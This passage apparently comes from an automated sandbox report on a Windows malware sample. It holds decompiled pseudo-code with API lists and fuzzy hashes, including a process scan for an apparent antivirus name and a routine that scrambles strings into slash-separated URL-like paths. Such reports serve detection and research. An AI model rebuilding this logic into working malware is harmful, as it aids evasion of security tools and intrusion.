                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t19 =  *0xa9d108( *_t32, 0x20);
                                                                                                                                                                                                                                					if(_t19 != 0) {
                                                                                                                                                                                                                                						 *_t19 = 0;
                                                                                                                                                                                                                                						_t19 = _t19 + 2;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t31 = E00A96ABB(0,  *_t32, _t19, 0);
                                                                                                                                                                                                                                					if(_t31 == 0) {
                                                                                                                                                                                                                                						if(_t25 == 0) {
                                                                                                                                                                                                                                							L22:
                                                                                                                                                                                                                                							return _t31;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                                						if(_t31 == 0) {
                                                                                                                                                                                                                                							L20:
                                                                                                                                                                                                                                							if(_t25 != 0) {
                                                                                                                                                                                                                                								CloseHandle(_t25);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L22;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A96E66: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04FD9BB8,00000000,?,?,69B25F44,00000005,00A9D00C,?,?,00A9588F), ref: 00A96E9C
                                                                                                                                                                                                                                  • Part of subcall function 00A96E66: lstrcpy.KERNEL32(00000000,00000000), ref: 00A96EC0
                                                                                                                                                                                                                                  • Part of subcall function 00A96E66: lstrcat.KERNEL32(00000000,00000000), ref: 00A96EC8
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00A9D2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00A9521B,?,00000001,?), ref: 00A96CC3
                                                                                                                                                                                                                                  • Part of subcall function 00A953BB: RtlFreeHeap.NTDLL(00000000,00000000,00A912FA,00000000,?,?,00000000), ref: 00A953C7
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00004E20,00A9521B,00000000,00000000,?,00000000,?,00A9521B,?,00000001,?,?,?,?,00A9A0EC), ref: 00A96D23
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00A9521B,?,00000001,?), ref: 00A96D51
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00A9521B,?,00000001,?,?,?,?,00A9A0EC), ref: 00A96D69
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
• Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
• Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
• Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 73268831-0
                                                                                                                                                                                                                                • Opcode ID: fb6e92e83f25a658f1ca62ca78ff8cc76031959d9114c85eaed903e40497ead1
                                                                                                                                                                                                                                • Instruction ID: 8e9fee793c08eb4be4d96f848abf7a74f0fa929e2cb3ad097bffd893c905ee4e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb6e92e83f25a658f1ca62ca78ff8cc76031959d9114c85eaed903e40497ead1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86210532740F559BCF319BA88D84A6B77E9EF88B20F050626F965EB150DF30CC428750
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 40%
                                                                                                                                                                                                                                			E00A9516C(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                				signed int* _t39;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t36 = __ecx;
                                                                                                                                                                                                                                				_v32 = 0;
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				_v12 = _a4;
                                                                                                                                                                                                                                				_t38 = E00A95597(__ecx,  &_v32);
                                                                                                                                                                                                                                				if(_t38 != 0) {
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					_t39 = _a8;
                                                                                                                                                                                                                                					L13:
                                                                                                                                                                                                                                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                                                                                                                                                						_t16 =  &(_t39[1]); // 0x5
                                                                                                                                                                                                                                						_t23 = _t16;
                                                                                                                                                                                                                                						if( *_t16 != 0) {
                                                                                                                                                                                                                                							E00A92C67(_t23);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					return _t38;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(E00A99B32(0x40,  &_v16) != 0) {
                                                                                                                                                                                                                                					_v16 = 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t40 = CreateEventA(0xa9d2e4, 1, 0,  *0xa9d384);
                                                                                                                                                                                                                                				if(_t40 != 0) {
                                                                                                                                                                                                                                					SetEvent(_t40);
                                                                                                                                                                                                                                					Sleep(0xbb8);
                                                                                                                                                                                                                                					CloseHandle(_t40);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_push( &_v32);
                                                                                                                                                                                                                                				if(_a12 == 0) {
                                                                                                                                                                                                                                					_t29 = E00A92D1C(_t36);
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_t29 = E00A94847(_t36);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t41 = _v16;
                                                                                                                                                                                                                                				_t38 = _t29;
                                                                                                                                                                                                                                				if(_v16 != 0) {
                                                                                                                                                                                                                                					E00A9704F(_t41);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_t38 != 0) {
                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t39 = _a8;
                                                                                                                                                                                                                                					_t38 = E00A96C82( &_v32, _t39);
                                                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00A9D2E4,00000001,00000000,00000040,00000001,?,747DF710,00000000,747DF730,?,?,?,00A9A0EC,?,00000001,?), ref: 00A951BD
                                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,00A9A0EC,?,00000001,?,00000002,?,?,00A958BD,?), ref: 00A951CA
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,?,?,?,00A9A0EC,?,00000001,?,00000002,?,?,00A958BD,?), ref: 00A951D5
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00A9A0EC,?,00000001,?,00000002,?,?,00A958BD,?), ref: 00A951DC
                                                                                                                                                                                                                                  • Part of subcall function 00A92D1C: WaitForSingleObject.KERNEL32(00000000,?,?,?,00A951FC,?,00A951FC,?,?,?,?,?,00A951FC,?), ref: 00A92DF6
Memory Dump Source
• Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
• Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
• Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
• Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2559942907-0
                                                                                                                                                                                                                                • Opcode ID: aa18a1aacdafcc066afd8164d4637d9bdc920ea3c0df661a882a6918d972b73e
                                                                                                                                                                                                                                • Instruction ID: 9212be30e8ab1285527550b34df89f648f221f196e1fcbcb67ca7236577c2105
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa18a1aacdafcc066afd8164d4637d9bdc920ea3c0df661a882a6918d972b73e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C216272F00619ABCF11BFF4C8869EE77F9EB48354F154526FA11A7100DB34AD458BA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                                                			E00A91A54(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                				intOrPtr* _t28;
                                                                                                                                                                                                                                				intOrPtr _t31;
                                                                                                                                                                                                                                				intOrPtr* _t32;
                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                				int _t46;
                                                                                                                                                                                                                                				intOrPtr* _t47;
                                                                                                                                                                                                                                				int _t48;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t47 = __eax;
                                                                                                                                                                                                                                				_push( &_v12);
                                                                                                                                                                                                                                				_push(__eax);
                                                                                                                                                                                                                                				_t39 = 0;
                                                                                                                                                                                                                                				_t46 = 0;
                                                                                                                                                                                                                                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                                                				_v8 = _t26;
                                                                                                                                                                                                                                				if(_t26 < 0) {
                                                                                                                                                                                                                                					L13:
                                                                                                                                                                                                                                					return _v8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_v12 == 0) {
                                                                                                                                                                                                                                					Sleep(0xc8);
                                                                                                                                                                                                                                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_v8 >= _t39) {
                                                                                                                                                                                                                                					_t28 = _v12;
                                                                                                                                                                                                                                					if(_t28 != 0) {
                                                                                                                                                                                                                                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                                                                                                                						_v8 = _t31;
                                                                                                                                                                                                                                						if(_t31 >= 0) {
                                                                                                                                                                                                                                							_t46 = lstrlenW(_v16);
                                                                                                                                                                                                                                							if(_t46 != 0) {
                                                                                                                                                                                                                                								_t46 = _t46 + 1;
                                                                                                                                                                                                                                								_t48 = _t46 + _t46;
                                                                                                                                                                                                                                								_t39 = E00A95157(_t48);
                                                                                                                                                                                                                                								if(_t39 == 0) {
                                                                                                                                                                                                                                									_v8 = 0x8007000e;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									memcpy(_t39, _v16, _t48);
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								__imp__#6(_v16);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t32 = _v12;
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					 *_a4 = _t39;
                                                                                                                                                                                                                                					 *_a8 = _t46 + _t46;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L13;
                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1198164300-0
                                                                                                                                                                                                                                • Opcode ID: 47e6fa45b269bb9747892b75876d834baf651355a14a46326f1ae58857ba1d51
                                                                                                                                                                                                                                • Instruction ID: 128dacfd576d711e2f72820e57fdd526937b79279f9061adab625b34f145cc99
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47e6fa45b269bb9747892b75876d834baf651355a14a46326f1ae58857ba1d51
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0213C75A0160AEFCB11DFA8D988D9EBBF8FF48351B108169E905E7210EB70DE41CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                			E00A9698B(unsigned int __eax, void* __ecx) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				signed int _t21;
                                                                                                                                                                                                                                				signed short _t23;
                                                                                                                                                                                                                                				char* _t27;
                                                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                				unsigned int _t33;
                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                				unsigned int _t38;
                                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                                				void* _t42;
                                                                                                                                                                                                                                				int _t45;
                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t42 = __eax;
                                                                                                                                                                                                                                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                                                                                                                                				_t38 = __eax;
                                                                                                                                                                                                                                				_t30 = RtlAllocateHeap( *0xa9d270, 0, (__eax >> 3) + __eax + 1);
                                                                                                                                                                                                                                				_v12 = _t30;
                                                                                                                                                                                                                                				if(_t30 != 0) {
                                                                                                                                                                                                                                					_v8 = _t42;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t33 = 0x18;
                                                                                                                                                                                                                                						if(_t38 <= _t33) {
                                                                                                                                                                                                                                							_t33 = _t38;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t21 =  *0xa9d288; // 0xbdb0c00
                                                                                                                                                                                                                                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                                                                                                                                						 *0xa9d288 = _t23;
                                                                                                                                                                                                                                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                                                                                                                                						memcpy(_t30, _v8, _t45);
                                                                                                                                                                                                                                						_v8 = _v8 + _t45;
                                                                                                                                                                                                                                						_t27 = _t30 + _t45;
                                                                                                                                                                                                                                						_t38 = _t38 - _t45;
                                                                                                                                                                                                                                						_t46 = _t46 + 0xc;
                                                                                                                                                                                                                                						 *_t27 = 0x2f;
                                                                                                                                                                                                                                						_t13 = _t27 + 1; // 0x1
                                                                                                                                                                                                                                						_t30 = _t13;
                                                                                                                                                                                                                                					} while (_t38 > 8);
                                                                                                                                                                                                                                					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v12;
                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00A9233E,00000000,?,?,00A9A714,?,04FD95B0), ref: 00A96996
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 00A969AE
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00A9233E,00000000,?,?,00A9A714,?,04FD95B0), ref: 00A969F2
                                                                                                                                                                                                                                • memcpy.NTDLL(00000001,?,00000001), ref: 00A96A13
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1819133394-0
                                                                                                                                                                                                                                • Opcode ID: 15994a68511da42e16dd4b72e60b15a75852ef698e842633043eaf2fbbeeb85e
                                                                                                                                                                                                                                • Instruction ID: 7fe1b8bffe0db65196da2054802b36fc99e10c2c314eae392ea583277078785f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15994a68511da42e16dd4b72e60b15a75852ef698e842633043eaf2fbbeeb85e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A11C272B00214EFDB10CBA9DD85D9ABBFAEB843A0F15027AF50597250EA709E4587A0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                                                                                                			E00A96ABB(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                                                				intOrPtr _v44;
                                                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                                                				void _v60;
                                                                                                                                                                                                                                				char _v64;
                                                                                                                                                                                                                                				intOrPtr _t18;
                                                                                                                                                                                                                                				intOrPtr _t19;
                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                				intOrPtr _t27;
                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t27 = __edi;
                                                                                                                                                                                                                                				_t26 = _a8;
                                                                                                                                                                                                                                				_t28 = E00A910E9(_a4, _t26, __edi);
                                                                                                                                                                                                                                				if(_t28 != 0) {
                                                                                                                                                                                                                                					memset( &_v60, 0, 0x38);
                                                                                                                                                                                                                                					_t18 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                					_t28 = 0;
                                                                                                                                                                                                                                					_v64 = 0x3c;
                                                                                                                                                                                                                                					if(_a12 == 0) {
                                                                                                                                                                                                                                						_t7 = _t18 + 0xa9e4e8; // 0x70006f
                                                                                                                                                                                                                                						_t19 = _t7;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t6 = _t18 + 0xa9e8f0; // 0x750072
                                                                                                                                                                                                                                						_t19 = _t6;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_v52 = _t19;
                                                                                                                                                                                                                                					_push(_t28);
                                                                                                                                                                                                                                					_v48 = _a4;
                                                                                                                                                                                                                                					_v44 = _t26;
                                                                                                                                                                                                                                					_v36 = _t27;
                                                                                                                                                                                                                                					E00A97020();
                                                                                                                                                                                                                                					_push( &_v64);
                                                                                                                                                                                                                                					if( *0xa9d0e4() == 0) {
                                                                                                                                                                                                                                						_t28 = GetLastError();
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_push(1);
                                                                                                                                                                                                                                					E00A97020();
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t28;
                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A910E9: SysAllocString.OLEAUT32(00000000), ref: 00A91143
                                                                                                                                                                                                                                  • Part of subcall function 00A910E9: SysAllocString.OLEAUT32(0070006F), ref: 00A91157
                                                                                                                                                                                                                                  • Part of subcall function 00A910E9: SysAllocString.OLEAUT32(00000000), ref: 00A91169
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A96ADE
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A96B2A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocString$ErrorLastmemset
                                                                                                                                                                                                                                • String ID: <$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3736384471-3662781078
                                                                                                                                                                                                                                • Opcode ID: d8619a0bffa0e4e2b499cd5a1559ae3980e82bbd69a5618c9e36b2d82c79f083
                                                                                                                                                                                                                                • Instruction ID: c629ac16d5a5e08a98495b09c0391335633c3193a57df294c22002f39e82d19f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8619a0bffa0e4e2b499cd5a1559ae3980e82bbd69a5618c9e36b2d82c79f083
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8901D771B00218ABDB10EFA5E885EDEBBF8AF08750F448066F904E7251EB7199458BA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                			E00A9A1D4() {
                                                                                                                                                                                                                                				char _v264;
                                                                                                                                                                                                                                				void* _v300;
                                                                                                                                                                                                                                				int _t8;
                                                                                                                                                                                                                                				intOrPtr _t9;
                                                                                                                                                                                                                                				int _t15;
                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t15 = 0;
                                                                                                                                                                                                                                				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                                                                				if(_t17 != 0) {
                                                                                                                                                                                                                                					_t8 = Process32First(_t17,  &_v300);
                                                                                                                                                                                                                                					while(_t8 != 0) {
                                                                                                                                                                                                                                						_t9 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                						_t2 = _t9 + 0xa9ee3c; // 0x73617661
                                                                                                                                                                                                                                						_push( &_v264);
                                                                                                                                                                                                                                						if( *0xa9d110() != 0) {
                                                                                                                                                                                                                                							_t15 = 1;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						L7:
                                                                                                                                                                                                                                						CloseHandle(_t17);
                                                                                                                                                                                                                                						goto L8;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				L8:
                                                                                                                                                                                                                                				return _t15;
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A9A1E4
                                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 00A9A1F7
                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 00A9A223
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A9A232
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 420147892-0
                                                                                                                                                                                                                                • Opcode ID: 8e9f174625544f7bb8e8ba6bef46b868f9e8e1ddb712c7f9d45d687d7cb3119f
                                                                                                                                                                                                                                • Instruction ID: 8071912a55905b5bc387dfc06f7af5a6a236b50c10b253028cf4af03d3e33d0d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9f174625544f7bb8e8ba6bef46b868f9e8e1ddb712c7f9d45d687d7cb3119f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CF090327011246ADF20EB669D4ADEF36ECDBD6714F000162F916D7010EE20DA8687F2
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A91F47() {
                                                                                                                                                                                                                                				void* _t1;
                                                                                                                                                                                                                                				intOrPtr _t5;
                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t1 =  *0xa9d2a4; // 0x2e0
                                                                                                                                                                                                                                				if(_t1 == 0) {
                                                                                                                                                                                                                                					L8:
                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				SetEvent(_t1);
                                                                                                                                                                                                                                				_t11 = 0x7fffffff;
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					SleepEx(0x64, 1);
                                                                                                                                                                                                                                					_t5 =  *0xa9d2f4; // 0x0
                                                                                                                                                                                                                                					if(_t5 == 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t11 = _t11 - 0x64;
                                                                                                                                                                                                                                					if(_t11 > 0) {
                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					break;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t6 =  *0xa9d2a4; // 0x2e0
                                                                                                                                                                                                                                				if(_t6 != 0) {
                                                                                                                                                                                                                                					CloseHandle(_t6);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t7 =  *0xa9d270; // 0x4be0000
                                                                                                                                                                                                                                				if(_t7 != 0) {
                                                                                                                                                                                                                                					HeapDestroy(_t7);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L8;
                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetEvent.KERNEL32(000002E0,00000001,00A959AE), ref: 00A91F52
                                                                                                                                                                                                                                • SleepEx.KERNEL32(00000064,00000001), ref: 00A91F61
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(000002E0), ref: 00A91F82
                                                                                                                                                                                                                                • HeapDestroy.KERNEL32(04BE0000), ref: 00A91F92
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4109453060-0
                                                                                                                                                                                                                                • Opcode ID: 4004f8032087574e01c170c19ffc530a553b324a06675c982da5e7d264530c80
                                                                                                                                                                                                                                • Instruction ID: 00ea3a884fc8811bcc11453ad01545da72026ed2b018297a3b0e8780af243915
